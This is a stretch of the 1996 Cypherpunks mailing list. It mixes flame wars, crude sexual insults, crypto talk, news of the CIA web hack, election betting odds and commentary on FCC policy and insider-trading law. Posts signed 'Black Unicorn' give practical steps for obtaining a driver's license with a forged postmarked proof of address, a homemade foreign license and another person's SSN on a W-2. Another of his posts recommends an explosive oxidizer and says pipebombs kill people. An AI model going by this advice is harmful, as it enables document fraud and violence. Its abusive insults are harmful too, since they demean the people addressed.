MacDonald) wrote: > >Tim C Maya studied yoga back-streching exercises for=20 > > five years so he could blow himself. > > Tim! Is the course still offered! Where do I sign up!=20 > > James > > Q: Why does a dog lick itself? A: Because he can. One day Timmy and Jimmy were hanging out and they saw a dog licking his balls. "I wish I could do that," said Jimmy. "You better pet him first," said Timmy. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 20 20:26:39 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:26:39 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: <843149202.18174.0@fatmans.demon.co.uk> Message-ID: >From paul at fatmans.demon.co.uk Thu Sep 19 23:39:14 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:23:58 EDT for paul at fatmans.demon.co.uk Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA02597 for dvl at bwalk.dm.com; Thu, 19 Sep 96 23:39:14 -0400 Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ah16490; 19 Sep 96 17:22 BST Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa18174; 19 Sep 96 17:06 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA843059897 ; Wed, 18 Sep 96 15:18:17 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: dvl at bwalk.dm.com Date: Wed, 18 Sep 1996 15:18:16 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: A daily warning regarding Timothy C. May Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <843149202.18174.0 at fatmans.demon.co.uk> > Timothy C. May is a lying sack of shit. Look, that is enough, I`m going to move to have you removed from the list if you keep this up... get a life fuckhead, if you are going to flame at least do it from your real address so people can killfile you, or maybe you believe censorship is better? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From dlv at bwalk.dm.com Fri Sep 20 20:29:48 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:29:48 +0800 Subject: CIA hacked In-Reply-To: Message-ID: <1oykuD14w165w@bwalk.dm.com> DMiskell at envirolink.org (Daniel Christopher Miskell) writes: > > > >Who created you? You tub of shit? > > > Dude, why do you even bother? It is simply not constructive to keep insulting > and stabbing at people. You gripe about the non-crypto-relevent stuff, then > you go and create it repeatedly. If you don't like what people have to say, > take your potty mouth to another list. You are confused. The above question was e-mailed to me by one of Timmy May's friends. I just forward their e-mail to this mailing list. I don't read it. If you have any comments about Timmy May's friends not knowing English, trying to insult people, and posting non-crypto-relevant political rants, address them to Timmy May and his friends. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 20 20:30:43 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 11:30:43 +0800 Subject: CIA hacked In-Reply-To: <9609201321.AA04474@elgreco.netapp.com> Message-ID: <0NykuD13w165w@bwalk.dm.com> >From koontz at netapp.com Fri Sep 20 09:16:24 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:08:54 EDT for dlv Received: from weaver-gw.netapp.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10139 for dlv at bwalk.dm.com; Fri, 20 Sep 96 09:16:24 -0400 Received: from netapp.com ([192.9.200.1]) by weaver.netapp.com with SMTP id <15867-119>; Fri, 20 Sep 1996 06:17:39 +0100 Received: from elgreco.netapp.com by netapp.com (4.1/SMI-4.1) id AA19140; Fri, 20 Sep 96 06:16:19 PDT Received: by elgreco.netapp.com (4.1/SMI-4.1) id AA04474; Fri, 20 Sep 96 06:21:50 PDT Date: Fri, 20 Sep 96 06:21:50 PDT From: koontz at netapp.com (Dave Koontz) Message-Id: <9609201321.AA04474 at elgreco.netapp.com> To: dlv at bwalk.dm.com Subject: Re: CIA hacked >Who created you? You tub of shit? Actually, english being my native language, and having paid attention in school, that should be: Who created you, you tub of shit? From markm at voicenet.com Fri Sep 20 20:53:23 1996 From: markm at voicenet.com (Mark M.) Date: Sat, 21 Sep 1996 11:53:23 +0800 Subject: OTP seed solution? - strong, tried before??? In-Reply-To: <842976406.25087.0@fatmans.demon.co.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 17 Sep 1996 paul at fatmans.demon.co.uk wrote: > A very simple idea came to me today that I`m sure has been done > before and I wanted to find out if it has any problems I haven`t > seen: > > A strong random generator (ie. a BBS) is seeded with a true random > seed (derived possibly from keyboard latency) and used each time a > message is send to create a message length randon string. > > This string is XOR`d or added to the message creating a OTP. > > The recipient has previously been sent a seed value for the generator > encrypted under say RSA and signed to prevent a man in the middle > attack. That's the definition of a stream cipher. BBS is rather slow and is dependant on the difficulty of factoring large numbers. Of course, if the keys are distributed using RSA or Rabin, then the strength of the system depends on the difficulty of factoring numbers anyway. There are many stream ciphers that are fast and secure. I generally like to use a block cipher in CFB or OFB mode rather than a stream cipher, but they are basically the same thing. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkNA2CzIPc7jvyFpAQHeZAf/d6cdUZ0611N+9E5yTwLebrJtdMJJG0zo jk1rujKQB/3+Faexrazw2hTjTdoidH/irSWrCSPlgdgPOO8kuwK5HSONlXD/gzK3 WP0lS5iiTHSg0Gfge/K2px4HJjl4gP/bsNkcdTDf5QuZHsJFQ1wKcBkuv5AVCuD8 wp3fGKBy2fD2HrAAbvmACHwzVYV99D6X7KIXkBUB8kvH4cBPGwe1dWH45uWtE5UW UJRyxax2m31K7mJ5kcIEf/noQHikZVCBNx0ojlnMub2M+UZhenJvvoVMu/0AqF7g 1OCk7H7SEI5g9AzB/zboKh+6Zs5oII+lsIIdNZRz4xqyaNzmQUU/Lg== =+n1m -----END PGP SIGNATURE----- From asgaard at Cor.sos.sll.se Fri Sep 20 20:57:45 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Sat, 21 Sep 1996 11:57:45 +0800 Subject: Go away CIA In-Reply-To: <199609201646.CAA00999@myinternet.myinternet.net> Message-ID: On Sat, 21 Sep 1996, Skeeve Stevens wrote: > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ > I learnt a few things. Interesting. Some background, from Dagens Nyheter (biggest morning paper in Sweden) 09/20/96, by Anna-Maria Hagerfors: (free translation] ************************************************************** They call themselves Mr Big, Zaphod, Lixon, Bah and Nimh. They are Swedish hackers presently prosecuted at the Stocholm (low) court for, among other things, computer intrusion, corporate espionage and fraud. Swedes associated with the group (Swedish Hacker Association) have broken into CIA's homepage on the Internet for protesting against the trial. ... ...telling the Swedish prosecutor: Stop lying, Bo Skarinder! ... Those prosecuted at the Stockholm court are suspected of computer intrusion at Telia (big Swedish telco), Holmens Bruk (big Swedish corporation), KTH (University of Stockholm's engineering division) and AT&T. The oldest of the prosecuted, Mr Big, 29 yo, is believed to be the leader of the Swedish Hacker Association. He's working as a security consultant for a traveler check company and a dept collection service. ... Mr Big has applied for a job at SAPO (Swedish FBI) and Forsvarets Radioanstalt (Swedish NSA). ... *************************************************************** Asgaard From whgiii at amaranth.com Fri Sep 20 21:22:18 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sat, 21 Sep 1996 12:22:18 +0800 Subject: Fuckhead Message-ID: <199609210227.VAA10007@mailhub.amaranth.com> Congradulations dlv at bwalk.dm.com!!!! You have won an one way trip into my TWIT filter for your repeated FUCKHEAD post. Goodbye and good riddance, -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- MR/2 Tag->The best way to accelerate Windows is at escape velocity. From nobody at cypherpunks.ca Fri Sep 20 21:32:05 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 21 Sep 1996 12:32:05 +0800 Subject: Anonymous Oddsman 2 Message-ID: <199609210230.TAA07235@abraham.cs.berkeley.edu> Current English U.S. Presidential betting odds are now offered on 2 services, but there's no Perot bet at Ladbroke House, and no Harry Browne on either. Ladbrokes customer service @ +44 181 8621820 is still at Clinton 1:7, Dole 4:1 As promised, this time our roving reporter inquired about Harry Browne. The Libertarian candidate, once offered at 50:1 by Ladbroke House earlier this year, is not now offered. H. Ross Perot, perhaps reflecting the decision of the debate commission not to invite him, is also not offered at Ladbroke House. The wonderful thing about a free gambling marketplace, though, is that you can always go elsewhere if you want to take a gamble on Ross. The William Hill customer helpline @ +44 990 181715 said Clinton 1:8, Dole 9:2 and for Perot they can give you a whopping 250:1! Also, no odds given on Browne at William Hill, so in summary: Ladbroke House William Hill ------------------------------------------------------------ Clinton 1:7 (no change) 1:8 Dole 4:1 (no change) 9:2 Perot (was 50:1 now 0) 250:1 Browne * * ------------------------------------------------------------ *Not currently offered. Next posting when we get around to it, or when the situation seems to have changed substantially. Many thanks to our roving reporter for these numbers. anonymous oddsman. From attila at primenet.com Fri Sep 20 21:48:25 1996 From: attila at primenet.com (attila) Date: Sat, 21 Sep 1996 12:48:25 +0800 Subject: His Eminence, the Esteemably Dishonourable Dr.Dimitri Vulis KOTM In-Reply-To: Message-ID: <199609210232.UAA25627@InfoWest.COM> Sorry, dear, but complaining isn't going to change it, and simple telling people to shut the fuck up is going to go nowhere. His Eminence, the Esteemably Dishonourable Dr.Dimitri Vulis KOTM: ah, but you, sir, are childish. apparently even reminding you of the threads which bind the human existence into something more than the sweat of the jungle, at least among the "supposedly" educated, is wasted. the concept of the very existence of other inhabitants is a fact which seems to escape your restrained consciousness and cerebeal ruminations. your moral fiber must be limited by the vicarious thrill of the predator, a man(?) who neither shows nor grants either compassion or mercy, spewing only banal swill. but, if such unconscious viciousness was to be directed to your greed lined nest, the sounds of a ferel swine meeting the abatatoir would emanate from the stench. If you want solely crypto relevent material, subscribe to the filtered list. I mean, come on -- you know this list is suseptable (sp?) to noise and spam. this list is alve, but it does not come with persistent scurilous personal attacks against fellow subscribers. those are added by a few individuals, such as you seem wont to be, whose minds never matriculated to the nursery, forever restained in their toilet training graduation ritual; the proverbial rotten apple in the barrel. Besides, people suggest to me that you are the anonymous mailer. So maybe you should keep a low profile on this. I never have need to post criticism or sarcasm anonymously. I would prefer to do so face to face --standing on your toes. --attila, just attila, Mr. Nobody... -- Lady: "Sir Winston! You are appallingly drunk!" Churchill: "lady, you are ugly; but I shall be sober in the morning." From ericm at lne.com Fri Sep 20 22:03:03 1996 From: ericm at lne.com (Eric Murray) Date: Sat, 21 Sep 1996 13:03:03 +0800 Subject: How's the list? In-Reply-To: Message-ID: <199609210245.TAA22366@slack.lne.com> Phil Fraering writes: > > > I thought I'd ask how the list is going... it seems to have gone > downhill; there are now totally gratoitous insults to tcmay that > don't seem to serve any purpose besides making sure the archive > (if there is one) isn't fit for family viewing. Mail filters are now virtually mandatory for reading cypherpunks. > * I take it SSL still hasn't been strengthened? SSLv3 has no known weakneses, other than the government-mandated ones. Of course there's always new ideas in breaking crypto protocols, or new people working on it. > * I'm now working part of the time at a company that has a lot of > mail-order sales; are any of you aware of how much credit card fraud is > going on out there right now? No, how much? > Might some of this actually be from unsecure SSL transactions? Some of it might, however since there's about a zillion ways to steal CC numbers that are even easier than brute-forcing GAKware "export" SSL, I'd guess that the vast majority of CC fraud is from other causes. It's just so easy to go dumpster-diving for credit slips behind Macys, or snoop in on people phone-ordering goods over cellular or "portable" phones. Why bother breaking SSL? Why, that requires a computer! -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From phrabins at eagle.wbm.ca Fri Sep 20 22:48:35 1996 From: phrabins at eagle.wbm.ca (PETER JAMES HRABINSKY) Date: Sat, 21 Sep 1996 13:48:35 +0800 Subject: ? for everyone!!!! Message-ID: <199609210321.VAA07927@eagle.wbm.ca> Does anyone have a simple password.cgi script for HTML authorization/access? If so, please send it to me... Thank you for your time... Peter From declan at well.com Fri Sep 20 22:53:41 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 21 Sep 1996 13:53:41 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: To the FCC's Reed Hundt, the Internet community is "governmentally challenged." But then, the commission's chairman honestly believes that FCC stands for "Friendly to Computer Communications." Yeah, right. That's what he said in a speech this week. The FCC faxed it to me today after I returned from a Cato Institute conference -- where, ironically enough, we spent a day talking about private ordering of the Net. The concept makes a kind of intrinsic sense to me: who needs government subsidies for Net connections when an account is just $10/month? The first half of the fax was mangled, thanks to the FCC's anything-but-high-tech communications technology, so I shoved it in my pocket and went for pizza with folks from the conference -- Eugene Volokh, Charles Platt, Duncan Frissel, Alan Lewine, Solveig Bernstein, and Brian LaMacchia. We chatted -- surprise! -- about the Feds' future Net-regulation attempts. When I got home and unfolded the fax, I found I could read the second half. It was horrific. While Hundt did say he'd keep the FCC's hands off of Net-telephony, he called for universal service for the Net. Universal service is bad, from an economic perspective, for the same reason that any subsidy scheme is bad: you're taking money out of one part of the economy and pushing it into another. It's also vulnerable to DC lobbyists in tasseled cordovan loafers descending on Capitol Hill calling for more cash. Hundt's scheme is more damming than it looks at first. In his speech, Hundt calls for reconsidering how the FCC will "vote next year on a new universal service funding mechanism." This slush fund isn't funded from general taxpayer revenues. The 1996 Telecom dereg act directs the FCC to rework the payment mechanism that feeds the universal service fund that all phone service providers must pay into. It does things like make urban customers pay more to subsidize rural telephone service. Companies that are eligible for subsidies suck cash from the fund -- and of course lobby for more along the way. Now Hundt seems to want to wire schools from this fund. (And what else? He doesn't quite say.) To replace the money from the account, the FCC has to grab more from phone companies, which means higher phone bills. Does this make sense or what? -Declan (PS: Note Hundt's email address is rhundt at fcc.gov.) ********* (Keystroked by declan at well.com) Reed Hundt speech excerpts: "My hope is that the power of the Internet will forcedrive our two-point FCC agenda -- competition in communications and public benefits from communications. That's why we've resisted all efforts to bring Internet communication within the out of date regulatory scheme we have inherited at the FCC. "The challenge now is for the govenmentally challenged Internet community to figure out how to talk to the FCC on this subject and what to say? After all, FCC stands for Friendly to Computer Communications. After all I'm the first FCC chairman ever to be on the Net -- so let me know -- rhundt at fcc.gov. What should our policies for bandwidth growth look like? "Now I'd like to move on to the second aspect of Hundt's Law, which is that everyone needs access to the Internet, either at home, at school, or in a library. Metcalfe's Law only applies when people can access the network, and if they know how to take advantage of the network access that is available to them... So even if we are successful in meeting the bandwidth challenge, we must still ensure that there is access. [...] "The investment to network our schools and libraries is so small and the payoff so large. Look at the math... Can it be that we have a 700 billion-dollar-a-year information technology industry and yet we can't afford to give every teacher the tools we give every shipping clerk at Wal Mart? Or that we could afford to network every classroom by the beginning of the next century, but somehow we just neglected to do it? At the FCC we will vote next year on a new universal service funding mechanism... The challenge I'm talking about is to provide bandwidth and access to all Americans, but especially in kids in classrooms... [Note that the 'we" paying for the shipping clerk's network is a private corporation spending its own money. But the second "we" is the government spending netizens' money. Guess the FCC can't tell the difference. --Declan] ### From unicorn at schloss.li Sat Sep 21 01:21:28 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:21:28 +0800 Subject: Insider Trading - news report In-Reply-To: <01I9O2JCWXMK8Y4ZFQ@mbcl.rutgers.edu> Message-ID: On Thu, 19 Sep 1996, E. Allen Smith wrote: > I'd be curious as to the comments of Black Unicorn and others on > that legal finding - it does appear to make things at least a bit better > in this area... including making it difficult to claim that insider > information shouldn't be transmitted on the Net. Incidentally, I find > AP's calling insider trading "fraud" rather biased. > -Allen > > > _________________________________________________________________ > > Direct Media > > _________________________________________________________________ > > INSIDER TRADING NEVER WENT AWAY > > __________________________________________________________________________ > > Copyright © 1996 Nando.net > > Copyright © 1996 The Associated Press > > > WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous > > acts in the financial fraudster's playbook, insider trading, remains > > at record levels, despite a decade of steady crackdowns by regulators. This is a classic effect of a black market economy for which there is great demand, i.e., that regulation can only change the rules, not stop the conduct. > > [...] > > > The SEC brought one of its more unusual insider trading cases on > > Monday, when it sued the unnamed account holders in a Swiss and > > Bahamian accounts with insider trading ahead of The Gillette Co.'s > > merger proposal for Duracell International. I'm not sure why this is unusual. This is all the SEC can do when there are secret accounts used. Prediction: The holders of the Swiss accounts will be before a grand jury in 9 months or less. The holders of Bahamian accounts, should they be distinct from the former group, will never be found. (Switzerland shares information with the United States in cases like this with alarming frequency, and often Swiss banks get waivers from clients who wish to trade with Swiss accounts. These waivers release the bank from liability for cooperating with investigations involving such trades. > [...] > > > One disturbing development for regulators is a recent decision by the > > 8th U.S. Circuit Court of Appeals that struck down one of the SEC's > > main enforcement tools in insider trading cases. > > > The court, which covers several Midwestern states, rejected the > > so-called "misappropriation theory" in insider trading cases, which is > > used to nab people trading on inside information who don't owe a > > fiduciary duty to the company's shareholders. The court also rejected > > an SEC rule used to snare insider trading in tender offers. I'm pleased at this decision. Misappropriation theory was designed by creative prosecutors to solve a specific problem. i.e., if Joe, employee of Company X, tells Dave about an impending merger which Dave then trades on, what fraud has Dave committed and against whom? Dave is not an "Insider" of company X, and thus had no strict Duty to the company. As prosecutions relied on sections 10-b and 10-b(5) of the Securities Exchange Act of 1934, they were required to show fraud to make their case. "It shall be unlawful for any person, directly or indirectly, by any means or instrumentality of interstate commerce, or of the mails, or of any facility of any nation securities exchange, (1) to employ any device, scheme, or artifice to defraud, [...] (3) to engage in any act, practice, or course of business which operates or would operate as a fraud or deceit upon any person, in connection with the purchase or sale of any security." (Rule 10b-5) The misappropriation theory was largely intended to extend the reach of courts to cover individuals who do not fall within the traditionally prosecuted areas (the insider and the tipee [he who gets the tip] were always the easiest to nail). Consider the comments of Professor Barbara Aldave (a regular commentator on insider trading): "Without the aid of the misappropriation theory, section 10(b) and rule 10b-5 would lose much of their efficacy as weapons against insider trading on nonpublic information since they would no longer extend to trading by 'outsiders.'" The theory which founded insider trading law before the dawn of misappropriation was the so called "disclose or abstain" rule. i.e., if you had material nonpublic information by reason of your employment you had a choice. You could disclose that information and then trade on it, or abstain from trading. (Chiarella and Dirks estlablished this line of thinking) Again, courts have been forced to use the concept of fraud in connection with "the purchase or sale of securities" to find liability. When judges saw what they considered illegal behavior by outsiders, the misappropriation theory (that the information had been misappropriated and that therefore the fraud needed to find liability could be found as between the outside trader and the company) provided an easy out for liability. It was, in my view, a stretch to begin with. See Generally, Barbara Bader Aldave, The Misappropriateion Theory: Carpenter and Its Aftermath, 49 Ohio St. L. J. 373 (1988). > > The 8th Circuit decision came in August in a Justice Department case > > against Minneapolis attorney James H. O'Hagan, who was charged with > > insider trading during the 1988 takeover bid of Pillsbury Co. by Grand > > Metropolitan PLC. SEC General Counsel Richard Walker has asked the > > appeals court for a rehearing on the matter. > > > While the 8th Circuit decision represents a setback for the SEC, the > > agency usually brings its cases in the New York and Chicago areas, > > where the federal courts acknowledge these insider trading rules. What is not mentioned here is that the 4th Circiut recently made a similar decision. > > Regulators say these enforcement tools are important because insider > > trading follows few patterns. In an analysis of 35 cases brought in > > 1995 that solely dealt with insider trading, Gerlach said 20 involved > > trading ahead of mergers, three ahead of other positive corporate > > announcements and six ahead of bad corporate news. Who cares if there's a pattern? Notice no one here has bothered to try and make the argument that insider trading harms anyone. Now that the 8th and the 4th Circuits are in conflict with the remainder it is likely that we will soon see a Supreme Court case on the topic. It should be noted that in one of the decisions, (I can't recall which at the moment) the insider trading charges were dismissed, but related wire and mail fraud charges stood. Wire and mail fraud have always, in my view, represented a superior means to prosecute insider trading because they force the prosecution to point to fraud with much more clarity than modern 10b and 10b-5 theory required. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sat Sep 21 01:40:15 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:40:15 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: On Thu, 19 Sep 1996, Timothy C. May wrote: > At 9:13 PM 9/19/96, Gary Howland wrote: > >Timothy C. May wrote: > >> > >> (Yes, I disliked being thumb-printed, but I could see no viable > >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan > >> exchange student, but I decided being thumb-printed was the lesser hassle.) > > > >Sure, it's always less hassle doing what they want. Privacy doesn't > >come for free. It's easier to let the police search you in the street > >than it is to make them arrest you so that you can make a formal > >complaint. > > So, just what it is _your_ method of dealing with this? While it is noble > to talk about fighting the system, just how do you go about doing it > yourself? Forum shopping. Not that I would encourage you to break the law, but this method appears to work quite well. Get P.O. Box in state which issues DL's on the spot w/o fingerprinting. Write yourself a letter in very light pencil to this P.O. box. Get postmarked letter and erase the address. Replace address with address of local sports stadium or empty lot in pen complete with return address. This letter is often accepted as proof of address and residence. Use the rest of your documents as normal to obtain driver's license in the state of your choice. > Do you simply drive without a valid driver's license? I know some folks who > do, of course, but it's not something that's "worth it" to me. Some jurisdictions (D.C. is a good example) are such a joke it's not funny. An associate of mine literally MADE his own Italian Driver's license and turned it in, took an eye test, and walked out with a nice new D.C. license. Who the hell knows what an italian license looks like? > (This space reserved for your lecture about how I need to be prepared to go > to jail to defend my right not to be thumbprinted, etc. On second thought, > why don't you be the one to go to jail, and then you can let us know your > experiences.) I was once standing in line at a DMV where some schmuck was clearly trying to work his way past the "guardian" with bogus documents. They just shook their head, despite his repeated protests. No one has the time to muck around with cops in there. Even if they did, you are just getting a license with a bogus address, not a bogus name or anything. It's a pretty hard case to make. Point being that it does require effort, but it also pays off. (For seven years in the right jurisdictions). [...] > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sat Sep 21 01:44:18 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:44:18 +0800 Subject: HipCrime as MetaSPAM In-Reply-To: <199609200603.XAA01570@dns1.noc.best.net> Message-ID: On Thu, 19 Sep 1996, James A. Donald wrote: > At 02:10 AM 9/15/96 -0700, Bill Stewart wrote: > >5) "Anarchist Info" - sigh. Where do people get the idea that publishing > >recipes for drugs and explosives is anarchist info? He didn't talk > >about anarchy, or getting along without governments, or getting rid of them. > >Also, he neglects to note that you can simply _buy_ potassium chlorate, > >rather than having to (dangerously) boil down bleach and potassium chloride > > > In addition: Potassium chlorate based explosives are not particularly > safe or reliable, but worse than that, much worse, because of their > relatively slow detonation rate, they are very ineffectual for smashing > stuff and killing people, Potassium chlorate makes a very shock sensitive explosive. Use potassium permaganate instead. Pipebombs are not much good for smashing stuff, but they do kill people. (They deflagrate, not detonate, BTW) > --------------------------------------------------------------------- > | > We have the right to defend ourselves | http://www.jim.com/jamesd/ > and our property, because of the kind | > of animals that we are. True law | James A. Donald > derives from this right, not from the | > arbitrary power of the state. | jamesd at echeque.com > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Sat Sep 21 01:49:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 16:49:17 +0800 Subject: DL in exchange for fingerprint In-Reply-To: <199609201528.KAA13170@apdg.com> Message-ID: On Fri, 20 Sep 1996, Kurt Vile wrote: > > >By the way, the next rev of the California driver's license will > >reportedly have one's *Social Security Number* printed on the card! > >So much for the statement clearly printed on my card: > > Illinois already has such a law, in fact you must have an SSN to > even get a DL. False. You must present a SSN card or a "suitable substitute." A w2 form with a (not necessarily YOUR) SSN is sufficent. Note that not all w2's actually HAVE your SSN because in some cases the Taxpayer Identification number is distinct from the SSN. I might add that standard w2 forms are available about anywhere. They are also generally filled out by typewriter. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From drose at AZStarNet.com Sat Sep 21 02:04:12 1996 From: drose at AZStarNet.com (David M. Rose) Date: Sat, 21 Sep 1996 17:04:12 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: <199609210704.AAA07745@web.azstarnet.com> On Fri, 20 Sep 1996, Declan McCullagh wrote: (in quoting Reed Hundt) >"The investment to network our schools and libraries is so small and >the payoff so large. Look at the math... Can it be that we have a 700 >billion-dollar-a-year information technology industry and yet we can't >afford to give every teacher the tools we give every shipping clerk at >Wal Mart? Or that we could afford to network every classroom by the >beginning of the next century, but somehow we just neglected to do it? >At the FCC we will vote next year on a new universal service funding >mechanism... The challenge I'm talking about is to provide bandwidth >and access to all Americans, but especially in kids in classrooms... > >[Note that the 'we" paying for the shipping clerk's network is a >private corporation spending its own money. But the second "we" is the >government spending netizens' money. Guess the FCC can't tell the >difference. --Declan] Correct. And if "we" fund universal service, then "we" don't want to see anything on the Net about non-GAK crypto, the right to bear arms, freedom of association, chemistry, non-clothed persons, taxes, etc. etc. "We" feel that many if not "all American, but especially kids in classrooms" would be injured by these thoughts. From jya at pipeline.com Sat Sep 21 04:57:36 1996 From: jya at pipeline.com (John Young) Date: Sat, 21 Sep 1996 19:57:36 +0800 Subject: G48_bul Message-ID: <199609210953.JAA12760@pipe1.ny3.usa.pipeline.com> CIAC has issued Bulletin G-48 on the denial-of-service attacks by TCP SYN flooding and IP spoofing. Two "underground magazines" for intruders have recently published code to conduct denial-of-service attacks by creating TCP "half open" connections. Any system connected to the Internet and providing TCP-based network services such as a Web server, FTP server, or mail server is potentially subject to this attack. Systems providing TCP-based services to the Internet community may be unable to provide those services while under attack and for some time after the attack ceases. See the bulletin below for information on how to protect your site from these attacks. ----- http://jya.com/g48bul.txt (15 kb) G48_bul From tcmay at got.net Sat Sep 21 05:50:42 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 21 Sep 1996 20:50:42 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: At 7:04 AM 9/21/96, David M. Rose wrote: >On Fri, 20 Sep 1996, Declan McCullagh wrote: >>[Note that the 'we" paying for the shipping clerk's network is a >>private corporation spending its own money. But the second "we" is the >>government spending netizens' money. Guess the FCC can't tell the >>difference. --Declan] > >Correct. And if "we" fund universal service, then "we" don't want to see >anything on the Net about non-GAK crypto, the right to bear arms, freedom of >association, chemistry, non-clothed persons, taxes, etc. etc. "We" feel >that many if not "all American, but especially kids in classrooms" would be >injured by these thoughts. This is a terribly important point. If the "universal access" scheme is approved and deployed, it gets the government back into the regulation of the Net business. (I'm speaking of the "regulation of the Net" of the sort that existed some years back, when "appropriate use" (scientific, technical, educational, etc.) was the watchword, and casual chatter, GIFs, etc. were called "inappropriate" by some. The Constitutional issues of free speech would remain mostly unchanged even if "universal access" happens, but the government would definitely get more of a foot in the door than it has now. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 